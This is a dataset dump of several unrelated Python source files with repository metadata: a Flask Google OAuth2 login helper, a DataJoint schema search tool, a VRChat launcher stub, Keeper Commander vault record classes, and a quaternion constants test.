redirect_uri = kwargs.pop('redirect_uri', self.redirect_uri)
state = self.sign_params(params or {})
return GOOGLE_OAUTH2_AUTH_URL + '?' + urlencode(
dict(client_id=self.client_id,
scope=' '.join(scopes),
redirect_uri=redirect_uri,
state=state,
**kwargs))
def unauthorized_callback(self):
"""
Redirect to login url with next param set as request.url
"""
return redirect(self.login_url(params=dict(next=request.url)))
def exchange_code(self, code, redirect_uri):
"""
Exchanges code for token/s
"""
token = requests.post(GOOGLE_OAUTH2_TOKEN_URL, data=dict(
code=code,
redirect_uri=redirect_uri,
grant_type='authorization_code',
client_id=self.client_id,
client_secret=self.client_secret,
)).json()
if not token or token.get('error'):
abort(400)
return token
def get_userinfo(self, access_token):
userinfo = requests.get(GOOGLE_OAUTH2_USERINFO_URL, params=dict(
access_token=access_token,
)).json()
if not userinfo or userinfo.get('error'):
abort(400)
return userinfo
def get_access_token(self, refresh_token):
"""
Use a refresh token to obtain a new access token
"""
token = requests.post(GOOGLE_OAUTH2_TOKEN_URL, data=dict(
refresh_token=refresh_token,
grant_type='refresh_token',
client_id=self.client_id,
client_secret=self.client_secret,
)).json()
if not token or token.get('error'):
return
return token
def oauth2callback(self, view_func):
"""
Decorator for OAuth2 callback. Calls `GoogleLogin.login` then
passes results to `view_func`.
"""
@wraps(view_func)
def decorated(*args, **kwargs):
params = {}
# Check sig
if 'state' in request.args:
params.update(**self.parse_state(request.args.get('state')))
if params.pop('sig', None) != make_secure_token(**params):
return self.login_manager.unauthorized()
code = request.args.get('code')
# Web server flow
if code:
token = self.exchange_code(
code,
url_for(
request.endpoint,
_external=True,
_scheme=self.redirect_scheme,
),
)
userinfo = self.get_userinfo(token['access_token'])
params.update(token=token, userinfo=userinfo)
# Browser flow
else:
if params:
params.update(dict(request.args.items()))
else:
return '''
<script>
window.onload = function() {
location.href = '?' + window.location.hash.substr(1);
};
</script>
'''
return view_func(**params)
return decorated
def user_loader(self, func):
"""
Shortcut for `login_manager`'s `flask_login.LoginManager.user_loader`
"""
self.login_manager.user_loader(func)
| 31
| 77
| 0.591301
| 6,123
| 0.893738
| 0
| 0
| 1,904
| 0.277916
| 0
| 0
| 1,932
| 0.282003
|
36b22bde35972eb29f3533959fb0afa7c884f64c
| 11,729
|
py
|
Python
|
datajoint_utilities/dj_search/search.py
|
iamamutt/datajoint-utilities
|
e5c87cf968d4a50f6819fd6ab743f264641947cc
|
[
"MIT"
] | 1
|
2022-02-03T18:19:50.000Z
|
2022-02-03T18:19:50.000Z
|
datajoint_utilities/dj_search/search.py
|
iamamutt/datajoint-utilities
|
e5c87cf968d4a50f6819fd6ab743f264641947cc
|
[
"MIT"
] | 4
|
2021-12-07T01:42:24.000Z
|
2022-02-21T17:36:56.000Z
|
datajoint_utilities/dj_search/search.py
|
iamamutt/datajoint-utilities
|
e5c87cf968d4a50f6819fd6ab743f264641947cc
|
[
"MIT"
] | 2
|
2021-11-08T14:47:41.000Z
|
2022-01-20T19:44:32.000Z
|
import datajoint as dj
import re
import inspect
from termcolor import colored
class DJSearch:
def __init__(self, db_prefixes=[''], context=None):
db_prefixes = [db_prefixes] if isinstance(db_prefixes, str) else db_prefixes
self.context = context or inspect.currentframe().f_back.f_locals
self.virtual_modules = {}
self.schema_names = set(s for s in iter(dj.list_schemas())
if any(p in s for p in db_prefixes))
tables_definitions = []
for schema_name in self.schema_names: # add progress bar
self.virtual_modules[schema_name] = dj.create_virtual_module(schema_name,
schema_name)
schema_definition = self.virtual_modules[schema_name].schema.save()
schema_definition = re.sub(r'(@)?schema(.*)\n', fr'\g<1>{schema_name}\g<2>\n',
schema_definition)[len(schema_name) + 93:]
for match in re.finditer(r"VirtualModule\('(\w+)', '(\w+)'\)", schema_definition):
vmod, vmod_rep = match.groups()
schema_definition = schema_definition.replace(vmod, vmod_rep)
tables_definitions.append('\n\n\n' + schema_definition)
# join definitions from all schema, remove INDEX and UNIQUE lines
defi = r'\n'.join(tables_definitions)
defi = re.sub(r'\s+?INDEX.+?\n|\s+?UNIQUE.+?\n', '', defi, flags=re.MULTILINE)
defi = re.sub(r'([\(\)\[\]\w])( *)"""', r'\g<1>\n\g<2>"""', defi)
self.definition_string = defi
def search(self, search_str, level=None, method='_do_search'):
"""
:param search_str: string to search for
:param level: 'table', 'attribute', 'comment'
:return:
"""
if level is not None and level not in ('table', 'attribute', 'comment'):
raise ValueError('Argument "level" must be ("table", "attribute", "comment")')
m = DJMatch(search_str, self.definition_string, self.virtual_modules, level=level,
method=method)
m.print()
return m
class DJMatch:
def __init__(self, search_str, definition_string, virtual_modules, level=None,
method='_do_search'):
self.search_str = search_str
self._definition_string = definition_string
self._virtual_modules = virtual_modules
self.matches = {}
getattr(self, method)(level)
def _do_search(self, level=None):
for match in re.finditer(r' *(class\s\w*?)?({})'.format(self.search_str),
self._definition_string, re.I):
is_class = bool(match.groups()[0])
if level == 'table':
if not is_class:
continue
else:
# safeguard against partial class_name match - e.g. "Unit" in "UnitSpikes"
if re.match(r'(\w+)\(', self._definition_string[match.span(2)[-1]:]):
continue
# extract the whole line this matched string is on
# from the last "\n" right before the match to the first "\n" right after
for line_start in re.finditer(r'\n', self._definition_string[:match.span()[-1]]):
pass
line_end = re.search(r'\n', self._definition_string[match.span()[-1]:])
line = self._definition_string[line_start.span()[0]:line_end.span()[-1] +
match.span()[-1]]
if ('dj.VirtualModule' in line
or 'dj.Schema' in line
or line.strip() in [f'@{vm}' for vm in self._virtual_modules]):
continue
if is_class:
is_attr, is_comment = False, False
elif ':' in line and '#' not in line:
is_attr, is_comment = True, False
elif ':' not in line and '#' in line:
is_attr, is_comment = False, True
elif ':' in line and '#' in line:
mstr_start = match.span(2)[0] - line_start.span()[0]
if mstr_start > line.index('#'):
is_attr, is_comment = False, True
elif mstr_start < line.index(':'):
is_attr, is_comment = True, False
else: # neither ':' nor '#' are present
is_attr, is_comment = False, False
if level == 'attribute' and (is_class or not is_attr):
continue
if level == 'comment' and (is_class or not is_comment):
continue
# extract the table this matched string belongs to
# from the
if is_class:
class_start = match
else:
for class_start in re.finditer(r' *class\s(\w+)\((.+)\):',
self._definition_string[:match.span()[-1]]):
pass
# non-greedy search for the end of the class definition
class_end = next(re.finditer('definition = """.*?"""' if is_class else '"""',
self._definition_string[match.span()[-1]:],
re.DOTALL))
tbl_defi = self._definition_string[class_start.span()[0]:class_end.span()[-1] +
match.span()[-1]]
tbl_name, tbl_tier = re.search(r'class\s(\w+)\((.+)\):', tbl_defi).groups()
# extract schema and master table - search from the beginning to the end of the
# class-definition string containing the match
for schema_match in re.finditer(r'@(\w+)\nclass\s(\w+)\((.+)\):',
self._definition_string[:class_end.span()[-1] +
match.span()[-1]]):
pass
schema_name, master_name, master_tier = schema_match.groups()
if tbl_tier == 'dj.Part':
master_prepend = '@{}\nclass {}({}):\n\n\t...\n\n'.format(schema_name,
master_name,
master_tier)
key = '{}.{}.{}'.format(schema_name, master_name, tbl_name)
try:
table = getattr(getattr(self._virtual_modules[schema_name], master_name), tbl_name)
except KeyError as e:
raise Warning(f'{str(e)}\nSuspecting DataJoint incompatible table definition')
else:
master_prepend = '@{}\n'.format(schema_name)
key = '{}.{}'.format(schema_name, tbl_name)
try:
table = getattr(self._virtual_modules[schema_name], tbl_name)
except KeyError as e:
raise Warning(f'{str(e)}\nSuspecting DataJoint incompatible table definition')
tbl_defi = master_prepend + tbl_defi
if key in self.matches:
tbl_defi = self.matches[key]['definition']
matched_str = match.groups()[1]
color_shift = len(re.findall(r'\x1b\[31m{}\x1b\[0m'.format(self.search_str),
tbl_defi, re.I)) * len(colored('', 'red'))
tbl_defi = ''.join([tbl_defi[:match.span(2)[0] - class_start.span()[0] +
color_shift + len(master_prepend)],
colored(matched_str, 'red'),
tbl_defi[match.span(2)[-1] - class_start.span()[0] +
color_shift + len(master_prepend):]])
if key in self.matches:
self.matches[key]['definition'] = tbl_defi
else:
self.matches[key] = {'definition': tbl_defi, 'table': table, 'tier': tbl_tier}
def _do_search2(self, level=None):
# regex constants
s = r'[\t ]*' # horizontal whitespace
w = r'\w*' # words valid for variable names
e = r'[\w()."\'=]*' # valid python expression
n = '\n\r\v\f' # vertical whitespace
a = fr'[^{n}]*' # all characters except vertical whitespace
# determine appropriate regex based on level
if level is None: # anywhere
level_regex = self.search_str
elif level == 'table':
level_regex = fr'(?<=[{n}]){s}class{s}{w}{self.search_str}{w}{e}:{s}(?=[#{n}])'
elif level == 'attribute':
level_regex = (f'(?<=[{n}]){s}(->{s}{e}{self.search_str}|'
f'{w}{self.search_str}{w}{s}(={s}{e}{s})?:){a}(?=[#{n}])')
elif level == 'comment':
level_regex = f'#{a}{self.search_str}{a}(?=[{n}])'
# split full definition into class blocks + iterate over those that match regex once
for match_definition in [b[2:] if i == 2 else b
for i, b in enumerate(self._definition_string.split('\n\n\n'))
if (i > 1 and 'dj.Schema' not in b and
next(re.finditer(level_regex, b, re.I), False))]:
schema_name, table_name, table_tier = re.compile(
fr'@(?P<schema_name>{w}){s}[{n}]'
fr'{s}class{s}(?P<table_name>{w}){s}\((?P<table_tier>{e})\):{s}(?=[#{n}])'
).match(match_definition).groups()
self.matches[f'{schema_name}.{table_name}'] = {
'definition': match_definition, 'pretty_definition': match_definition,
'schema_name': schema_name, 'table': table_name, 'tier': table_tier,
'matches': [],
}
color_shift = 9 # shift for red color
# iterate over matches within class block to store match and adjust color
for i, match in enumerate([m for m in re.finditer(level_regex,
match_definition,
re.I)]):
self.matches[f'{schema_name}.{table_name}']['matches'].append(match)
L, R = match.span()
# print(f'debug: {repr(match_definition[L+i*color_shift:R+i*color_shift])}')
L, R = tuple(map(sum, zip((L, L), next(re.finditer(
self.search_str,
self.matches[f'{schema_name}.{table_name}']['pretty_definition'][
L+i*color_shift:R+i*color_shift],
re.I)).span())))
self.matches[f'{schema_name}.{table_name}']['pretty_definition'] = (
self.matches[f'{schema_name}.{table_name}']['pretty_definition'][
:L+i*color_shift] +
colored(self.matches[f'{schema_name}.{table_name}']['pretty_definition'][
L+i*color_shift:R+i*color_shift], 'red') +
self.matches[f'{schema_name}.{table_name}']['pretty_definition'][
R+i*color_shift:])
def print(self):
if not self.matches:
print('No match found!')
else:
try:
matched_str = '\n-------------------------------------\n'.join(
[m['pretty_definition'] for m in self.matches.values()])
except KeyError:
matched_str = '\n-------------------------------------\n'.join(
[m['definition'] for m in self.matches.values()])
print(matched_str)
| 50.339056
| 103
| 0.499446
| 11,645
| 0.992838
| 0
| 0
| 0
| 0
| 0
| 0
| 2,879
| 0.24546
|
36b29aea512c076457ac717e34101b418e8451d8
| 1,838
|
py
|
Python
|
acvrct.py
|
lyzcoote/VRChat-Py-Launcher
|
307fc26d2a464ba97e93293f757e7fdaa29098de
|
[
"MIT"
] | null | null | null |
acvrct.py
|
lyzcoote/VRChat-Py-Launcher
|
307fc26d2a464ba97e93293f757e7fdaa29098de
|
[
"MIT"
] | null | null | null |
acvrct.py
|
lyzcoote/VRChat-Py-Launcher
|
307fc26d2a464ba97e93293f757e7fdaa29098de
|
[
"MIT"
] | null | null | null |
################################################################################
# #
# Modules #
# #
################################################################################
import otherUtils as otherUtils
import sys
import os
################################################################################
# #
# Functions #
# #
################################################################################
def override_where():
""" overrides certifi.core.where to return actual location of cacert.pem"""
return os.path.abspath("cacert.pem")
if hasattr(sys, "frozen"):
import certifi.core
os.environ["REQUESTS_CA_BUNDLE"] = override_where()
certifi.core.where = override_where
import requests.utils
import requests.adapters
requests.utils.DEFAULT_CA_BUNDLE_PATH = override_where()
requests.adapters.DEFAULT_CA_BUNDLE_PATH = override_where()
################################################################################
# #
# Main App #
# #
################################################################################
if __name__ == "__main__":
sys.tracebacklimit = 0
otherUtils.launcherMenu()
| 40.844444
| 80
| 0.259521
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,325
| 0.720892
|
36b2e2e2a3deb4780a06fa5d022548e328c4c7a6
| 16,002
|
py
|
Python
|
keepercommander/vault.py
|
Keeper-Security/commander
|
93fee5d2ba56f2288e00ab33003597d00a302b5c
|
[
"MIT"
] | null | null | null |
keepercommander/vault.py
|
Keeper-Security/commander
|
93fee5d2ba56f2288e00ab33003597d00a302b5c
|
[
"MIT"
] | null | null | null |
keepercommander/vault.py
|
Keeper-Security/commander
|
93fee5d2ba56f2288e00ab33003597d00a302b5c
|
[
"MIT"
] | null | null | null |
# _ __
# | |/ /___ ___ _ __ ___ _ _ ®
# | ' </ -_) -_) '_ \/ -_) '_|
# |_|\_\___\___| .__/\___|_|
# |_|
#
# Keeper Commander
# Contact: ops@keepersecurity.com
#
import abc
import datetime
import json
from typing import Optional, List, Tuple, Iterable, Type, Union, Dict, Any
import itertools
from .params import KeeperParams
from . import record_types
class KeeperRecord(abc.ABC):
def __init__(self):
self.record_uid = ''
self.title = ''
self.client_time_modified = 0
self.record_key = b''
self.revision = 0
@abc.abstractmethod
def get_version(self): # type: () -> int
pass
@property
def version(self):
return self.get_version()
@abc.abstractmethod
def get_record_type(self): # type: () -> str
pass
@property
def record_type(self):
return self.get_record_type()
@abc.abstractmethod
def load_record_data(self, data, extra=None): # type: (dict, Optional[dict]) -> None
pass
@staticmethod
def create(params, record_type): # type: (KeeperParams, str) -> Optional['KeeperRecord']
if not record_type:
record_type = 'login'
if record_type in {'legacy', 'general'}:
record = PasswordRecord()
elif record_type == 'file':
record = FileRecord()
else:
record = TypedRecord()
meta_data = next((x for x in params.record_type_cache.values()
if x.get('$id', '') == record_type.lower()), None)
if meta_data and 'fields' in meta_data:
for field in meta_data['fields']:
typed_field = TypedField()
typed_field.type = field.get('$ref', 'text')
typed_field.label = field.get('label', None)
record.fields.append(typed_field)
return record
@staticmethod
def load(params, rec):
# type: (KeeperParams, Union[str, Dict[str, Any]]) -> Optional['KeeperRecord']
if isinstance(rec, str):
if rec not in params.record_cache:
return
record = params.record_cache[rec]
elif isinstance(rec, dict):
record = rec
else:
return
if 'data_unencrypted' not in record:
return
version = record.get('version', 0)
if version == 2:
keeper_record = PasswordRecord()
elif version == 3:
keeper_record = TypedRecord()
elif version == 4:
keeper_record = FileRecord()
keeper_record.storage_size = record.get('file_size')
elif version == 5:
keeper_record = ApplicationRecord()
else:
return
keeper_record.record_uid = record['record_uid']
keeper_record.revision = record.get('revision', 0)
keeper_record.record_key = record['record_key_unencrypted']
keeper_record.client_time_modified = record.get('client_modified_time', 0)
data = json.loads(record['data_unencrypted'])
extra = json.loads(record['extra_unencrypted']) if 'extra_unencrypted' in record else None
keeper_record.load_record_data(data, extra)
return keeper_record
def enumerate_fields(self): # type: () -> Iterable[Tuple[str, Union[None, str, List[str]]]]
yield '(title)', self.title
@staticmethod
def size_to_str(size): # type: (Union[int, float]) -> str
scale = 'Bytes'
if size > 0:
if size > 1000:
size = size / 1024
scale = 'Kb'
if size > 1000:
size = size / 1024
scale = 'Mb'
if size > 1000:
size = size / 1024
scale = 'Gb'
return f'{size:.2f}'.rstrip('0').rstrip('.') + f' {scale}'
class CustomField(object):
def __init__(self, custom_field=None): # type: (Optional[dict]) -> None
if custom_field is None:
custom_field = {}
self.name = custom_field.get('name', '')
self.value = custom_field.get('value', '')
self.type = custom_field.get('type', '')
class AttachmentFileThumb:
def __init__(self, thumb_field=None): # type: (Optional[dict]) -> None
self.id = thumb_field.get('id', '') if thumb_field else ''
self.type = thumb_field.get('type', '') if thumb_field else ''
self.size = thumb_field.get('size', 0) if thumb_field else 0
class AttachmentFile(object):
def __init__(self, file_field=None): # type: (Optional[dict]) -> None
self.id = file_field.get('id', '')
self.key = file_field.get('key', '')
self.name = file_field.get('name', '')
self.title = file_field.get('title', '')
self.mime_type = file_field.get('type', '')
self.size = file_field.get('size', 0)
self.last_modified = file_field.get('lastModified', 0) if file_field else 0 # type: int
self.thumbnails = [] # type: List[AttachmentFileThumb]
if file_field and 'thumbnails' in file_field:
thumbs = file_field.get('thumbnails')
if isinstance(thumbs, list):
for thumb in thumbs:
self.thumbnails.append(AttachmentFileThumb(thumb))
class ExtraField(object):
def __init__(self, extra_field=None): # type: (Optional[dict]) -> None
if extra_field is None:
extra_field = {}
self.id = extra_field.get('id', '')
self.field_type = extra_field.get('field_type', '')
self.field_title = extra_field.get('field_title', '')
self.data = extra_field.get('data', '')
class PasswordRecord(KeeperRecord):
def __init__(self):
super(PasswordRecord, self).__init__()
self.login = ''
self.password = ''
self.link = ''
self.notes = ''
self.custom = [] # type: List[CustomField]
self.attachments = None # type: Optional[List[AttachmentFile]]
self.totp = '' # type: str
def get_version(self): # type: () -> int
return 2
def get_record_type(self):
return ''
def load_record_data(self, data, extra=None):
self.title = data.get('title', '')
self.login = data.get('secret1', '')
self.password = data.get('secret2', '')
self.link = data.get('link', '')
self.notes = data.get('notes', '')
custom = data.get('custom')
if isinstance(custom, list):
self.custom.extend((CustomField(x) for x in custom if isinstance(x, dict) and 'name' in x))
if isinstance(extra, dict):
if 'files' in extra:
self.attachments = [AttachmentFile(x) for x in extra['files']]
if 'fields' in extra and isinstance(extra['fields'], list):
self.totp = next((x.get('data', '') for x in extra['fields'] if x.get('field_type') == 'totp'), '')
def enumerate_fields(self):
# type: () -> Iterable[Tuple[str, Union[None, str, List[str]]]]
for pair in super(PasswordRecord, self).enumerate_fields():
yield pair
yield '(login)', self.login
yield '(password)', self.password
yield '(url)', self.link
yield '(notes)', self.notes
if self.totp:
yield '(oneTimeCode)', self.totp
for cf in self.custom:
yield cf.name, cf.value
if self.attachments:
for atta in self.attachments:
yield atta.title or atta.name, f'File ID: {atta.id}; Size: {KeeperRecord.size_to_str(atta.size)}'
class TypedField(object):
def __init__(self, typed_field=None):
if typed_field is None:
typed_field = {}
self.type = typed_field.get('type', '')
self.label = typed_field.get('label', '')
self.value = typed_field.get('value', [])
def get_default_value(self, value_type=None): # type: (Optional[Type]) -> any
value = None
if isinstance(self.value, list):
if len(self.value) > 0:
value = self.value[0]
else:
value = self.value
if isinstance(value_type, type):
if not isinstance(value, value_type):
return
return value
def get_field_name(self):
return f'({self.type}).{self.label}' if self.type and self.label else \
f'({self.type})' if self.type else \
f'{self.label}'
@staticmethod
def get_exported_value(field_type, field_value):
# type: (str, Any) -> Iterable[str]
if not field_value:
return
if isinstance(field_value, str):
yield field_value
return
rf = record_types.RecordFields.get(field_type)
ft = record_types.FieldTypes.get(rf.type) if rf else None
if isinstance(field_value, int):
if ft.name == 'date':
if field_value != 0:
dt = datetime.datetime.fromtimestamp(int(field_value // 1000)).date()
yield str(dt)
else:
yield str(field_value)
elif isinstance(field_value, list):
for elem in field_value:
for ev in TypedField.get_exported_value(field_type, elem):
yield ev
elif isinstance(field_value, dict):
if ft.name == 'host':
hostname = field_value.get('hostname') or ''
port = field_value.get('port') or ''
if hostname or port:
if port:
hostname = f'{hostname}:{port}'
yield hostname
elif ft.name == 'phone':
phone = field_value.get('type') or ''
if phone:
phone += ':'
for key in ('region', 'number', 'ext'):
if key in field_value:
value = field_value[key]
if value:
phone += f' {value}'
yield phone
elif ft.name == 'name':
last = field_value.get('last') or ''
first = field_value.get('first') or ''
middle = field_value.get('middle') or ''
if last or first or middle:
name = f'{last},'
if first:
name += f' {first}'
if middle:
name += f' {middle}'
yield name
elif ft.name == 'address':
street = ' '.join(x for x in (field_value.get('street1'), field_value.get('street1')) if x)
city = field_value.get('city') or ''
state = ' '.join(x for x in (field_value.get('state'), field_value.get('zip')) if x)
country = field_value.get('country') or ''
if street or city or state or country:
address = ', '.join((street, city, state, country))
while address.endswith(', '):
address = address.rstrip(', ')
yield address
elif ft.name == 'securityQuestion':
q = (field_value.get('question') or '').rstrip('?')
a = field_value.get('answer') or ''
if q or a:
yield f'{q}? {a}'
elif ft.name == 'paymentCard':
number = field_value.get('cardNumber') or ''
expiration = field_value.get('cardExpirationDate') or ''
cvv = field_value.get('cardSecurityCode') or ''
if number or expiration or cvv:
if expiration:
number += f' EXP:{expiration}'
if cvv:
number += f' {cvv}'
yield cvv
elif ft.name == 'bankAccount':
account = field_value.get('accountType') or ''
if account:
account += ':'
for key in ('routingNumber', 'accountNumber'):
if key in field_value:
value = field_value[key]
if value:
account += f' {value}'
if account:
yield account
elif ft.name == 'privateKey':
private_key = field_value.get('privateKey') or ''
if private_key:
yield private_key
def get_external_value(self): # type: () -> Iterable[str]
for value in self.get_exported_value(self.type, self.value):
yield value
class TypedRecord(KeeperRecord):
def __init__(self):
super(TypedRecord, self).__init__()
self.type_name = ''
self.notes = ''
self.fields = [] # type: List[TypedField]
self.custom = [] # type: List[TypedField]
def get_version(self): # type: () -> int
return 3
def get_record_type(self):
return self.type_name
def get_typed_field(self, field_type, label=None): # type: (str, Optional[str]) -> Optional[TypedField]
return next((x for x in itertools.chain(self.fields, self.custom)
if field_type == x.type and (not label or (x.label and label.casefold() == x.label.casefold()))),
None)
def load_record_data(self, data, extra=None):
self.type_name = data.get('type', '')
self.title = data.get('title', '')
self.notes = data.get('notes', '')
self.fields.extend((TypedField(x) for x in data.get('fields', [])))
self.custom.extend((TypedField(x) for x in data.get('custom', [])))
def enumerate_fields(self):
# type: () -> Iterable[Tuple[str, Union[None, str, List[str]]]]
for pair in super(TypedRecord, self).enumerate_fields():
yield pair
yield '(type)', self.record_type
yield '(notes)', self.notes
for field in itertools.chain(self.fields, self.custom):
values = list(field.get_external_value())
yield field.get_field_name(), '' if len(values) == 0 else values[0] if len(values) == 1 else values
class FileRecord(KeeperRecord):
def __init__(self):
super(FileRecord, self).__init__()
self.name = ''
self.size = None # type: Optional[int]
self.mime_type = ''
self.last_modified = None # type: Optional[int]
self.storage_size = None # type: Optional[int]
def get_version(self): # type: () -> int
return 4
def get_record_type(self):
return 'file'
def load_record_data(self, data, extra=None):
self.title = data.get('title', '')
self.name = data.get('name', '')
self.size = data.get('size')
self.mime_type = data.get('type', '')
self.last_modified = data.get('lastModified')
def enumerate_fields(self): # type: () -> Iterable[Tuple[str, Union[None, str, List[str]]]]
for pair in super(FileRecord, self).enumerate_fields():
yield pair
yield '(type)', self.get_record_type()
yield '(name)', self.name
if self.mime_type:
yield '(mime-type)', self.mime_type
yield '(size)', KeeperRecord.size_to_str(self.size)
class ApplicationRecord(KeeperRecord):
def __init__(self):
super(ApplicationRecord, self).__init__()
def get_version(self):
return 5
def get_record_type(self):
return 'app'
def load_record_data(self, data, extra=None):
self.title = data.get('title', '')
def enumerate_fields(self): # type: () -> Iterable[Tuple[str, Union[None, str, List[str]]]]
for pair in super(ApplicationRecord, self).enumerate_fields():
yield pair
yield '(type)', self.get_record_type()
| 37.213953
| 118
| 0.541057
| 15,601
| 0.97488
| 6,098
| 0.381054
| 7,192
| 0.449416
| 0
| 0
| 2,764
| 0.172718
|
36b37042d59ea92a31e186729793c7340e94c845
| 773
|
py
|
Python
|
tests/test_quaternionic.py
|
mhostetter/quaternionic
|
159ba7caa41afe33172373ebe4119209577812c1
|
[
"MIT"
] | 40
|
2020-08-11T22:13:49.000Z
|
2022-03-25T08:10:19.000Z
|
tests/test_quaternionic.py
|
mhostetter/quaternionic
|
159ba7caa41afe33172373ebe4119209577812c1
|
[
"MIT"
] | 28
|
2020-08-27T17:09:34.000Z
|
2022-03-27T19:56:57.000Z
|
tests/test_quaternionic.py
|
mhostetter/quaternionic
|
159ba7caa41afe33172373ebe4119209577812c1
|
[
"MIT"
] | 6
|
2020-09-05T13:12:51.000Z
|
2022-03-10T02:59:05.000Z
|
import warnings
import numpy as np
import quaternionic
import pytest
def test_constants():
for const in ['one', 'x', 'y', 'z', 'i', 'j', 'k']:
assert hasattr(quaternionic, const)
c = getattr(quaternionic, const)
with pytest.raises(ValueError):
c *= 1.2
assert np.equal(quaternionic.one, quaternionic.array(1, 0, 0, 0))
assert np.equal(quaternionic.x, quaternionic.array(0, 1, 0, 0))
assert np.equal(quaternionic.i, quaternionic.array(0, 1, 0, 0))
assert np.equal(quaternionic.y, quaternionic.array(0, 0, 1, 0))
assert np.equal(quaternionic.j, quaternionic.array(0, 0, 1, 0))
assert np.equal(quaternionic.z, quaternionic.array(0, 0, 0, 1))
assert np.equal(quaternionic.k, quaternionic.array(0, 0, 0, 1))
| 38.65
| 69
| 0.659767
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 23
| 0.029754
|